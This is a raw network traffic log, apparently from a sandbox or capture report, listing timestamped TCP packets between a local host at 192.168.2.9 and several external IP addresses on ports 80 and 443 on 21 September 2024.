Sep 21, 2024 14:48:10.582062960 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582067013 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.582073927 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582092047 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.582109928 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.582228899 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582240105 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582251072 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582256079 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582273960 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.582273006 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.582284927 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.582304001 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.582304955 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.582315922 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.582329035 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.582335949 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.582343102 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.582355976 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.582360029 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582372904 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582375050 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.582385063 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582395077 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582403898 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.582406044 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.582412958 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.582425117 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582434893 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582436085 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.582453012 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582458973 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.582467079 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582479954 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582484961 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.582490921 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582500935 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582514048 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.582520008 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582530022 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582530975 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.582535982 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582545996 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582546949 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.582551956 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582556963 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582562923 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582567930 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582573891 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582573891 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.582580090 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582586050 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582592010 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582631111 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582642078 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582658052 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.582663059 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582675934 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582683086 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.582686901 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582700014 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582700968 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.582727909 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.582745075 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582753897 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.582781076 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.582815886 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582827091 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582838058 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582849026 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.582849979 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582865953 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.582880974 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.582925081 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582942963 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582967043 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582978010 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.582978964 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.582990885 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.583000898 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.583003044 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.583014965 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.583030939 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.583034992 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.583046913 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.583058119 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.583061934 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.583079100 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.583081007 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.583090067 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.583100080 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.583101988 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.583120108 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.583122015 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.583132982 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.583153009 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.583153009 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.583165884 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.583168030 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.583179951 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.583192110 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.583199978 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.583204031 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.583214045 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.583237886 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.583241940 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.583250999 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.583276987 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.583302021 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.583302975 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.583314896 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.583324909 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.583345890 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.583347082 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.583359003 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.583368063 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.583375931 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.583394051 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.583404064 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.583415985 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.583421946 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.583429098 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.583452940 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.583467960 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.583841085 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.583888054 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.583892107 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.583903074 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.583925962 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.583934069 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.583944082 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.583945036 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.583956003 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.583967924 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.583976984 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.584001064 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.584007978 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.584013939 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.584024906 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.584034920 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.584036112 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.584048033 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.584060907 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.584076881 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.584089041 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.584089041 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.584100962 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.584110022 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.584111929 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.584124088 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.584135056 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.584135056 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.584163904 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.613104105 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.613112926 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.613125086 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.613130093 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.613141060 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.613207102 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.613219023 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.613225937 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.613246918 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.613253117 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.613261938 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.613262892 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.613267899 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.613296032 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.613325119 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.613344908 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.613351107 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.613363028 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.613368034 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.613373995 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.613392115 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.613423109 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.613486052 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.613492012 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.613502979 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.613508940 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.613514900 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.613521099 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.613533020 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.613537073 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.613555908 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.613573074 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.614494085 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.614523888 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.614533901 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.614571095 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.614598989 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.614604950 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.614618063 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.614622116 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.614629030 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.614645958 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.614662886 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.614691019 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.614737034 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.614743948 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.614756107 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.614762068 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.614768028 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.614782095 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.614783049 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.614789963 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.614800930 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.614806890 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.614814043 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.614814997 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.614834070 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.614850044 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.614886045 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.615025043 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.615030050 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.615042925 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.615089893 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.615089893 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.615089893 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.615098000 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.615109921 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.615117073 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.615134001 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.615153074 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.615173101 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.615180016 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.615190983 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.615195990 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.615226030 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.615237951 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.615408897 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.615415096 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.615426064 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.615432978 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.615464926 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.615478039 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.615524054 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.615529060 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.615540028 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.615545034 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.615554094 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.615571022 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.615571976 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.615577936 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.615590096 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.615597010 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.615607023 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.615607977 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.615616083 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.615633011 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.615649939 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.615715981 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.615721941 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.615751028 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.615756989 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.615763903 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.615768909 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.615777016 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.615794897 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.615808964 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.615844965 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.615869045 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.615880013 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.615912914 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.615951061 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.615957975 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.615968943 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.615976095 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.615995884 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.616000891 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.616008043 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.616010904 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.616030931 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.616051912 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.616187096 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.616193056 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.616209984 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.616218090 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.616229057 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.616236925 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.616256952 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.616272926 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.625375032 CEST	443	49726	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:10.625396967 CEST	443	49726	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:10.625488997 CEST	49726	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:10.625511885 CEST	443	49726	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:10.625585079 CEST	49726	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:10.625962019 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.625981092 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.625992060 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.626046896 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.626044989 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.626053095 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.626075983 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.626081944 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.626092911 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.626095057 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.626120090 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.626138926 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.630906105 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.630914927 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.630953074 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.630959988 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.630970955 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.630990982 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.630999088 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.631006956 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.631019115 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.631088018 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.638828993 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.638910055 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.638921976 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.638928890 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.638942003 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.638948917 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.638956070 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.638962984 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.639002085 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.639061928 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.640543938 CEST	443	49729	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:10.640582085 CEST	443	49729	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:10.640697956 CEST	49729	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:10.640697956 CEST	49729	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:10.640722990 CEST	443	49729	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:10.642813921 CEST	49729	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:10.644889116 CEST	443	49726	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:10.644973040 CEST	49726	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:10.655566931 CEST	443	49729	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:10.655731916 CEST	49729	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:10.661480904 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.661489010 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.661499977 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.661505938 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.661525965 CEST	80	49713	176.113.115.33	192.168.2.9
